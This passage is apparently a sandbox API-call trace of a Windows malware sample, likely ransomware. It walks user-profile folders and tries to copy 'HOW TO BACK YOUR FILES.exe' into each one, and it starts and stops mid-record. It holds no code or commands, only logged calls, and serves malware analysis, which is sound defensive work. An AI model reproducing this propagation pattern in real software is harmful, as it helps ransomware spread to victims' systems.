cAlternateFileName="")) returned 0x2cd0e8 [0078.830] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.830] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.830] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.831] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0078.831] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.831] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.831] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.831] GetLastError () returned 0x0 [0078.832] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.832] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.832] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.832] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.832] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.832] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.832] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.832] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.833] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.833] GetLastError () returned 0x0 [0078.833] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.833] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.833] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.833] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.833] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.833] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.833] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.833] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.834] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.834] GetLastError () returned 0x0 [0078.834] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.834] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.835] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0078.835] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0078.835] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.835] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.835] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.836] GetLastError () returned 0x0 [0078.836] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.836] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.836] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0078.836] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0078.836] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.836] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.837] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.837] GetLastError () returned 0x0 [0078.837] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.837] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.837] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.838] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.838] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.838] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.838] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.838] GetLastError () returned 0x0 [0078.839] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.839] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.839] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.839] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.839] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.839] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.840] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.840] GetLastError () returned 0x0 [0078.840] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.840] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.840] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.840] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.840] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.840] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.841] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.841] GetLastError () returned 0x0 [0078.841] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.841] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.842] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.842] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.842] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.842] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.842] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.842] GetLastError () returned 0x0 [0078.843] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.843] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.843] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0078.843] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0078.843] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.843] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.844] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.844] GetLastError () returned 0x0 [0078.844] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.844] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application 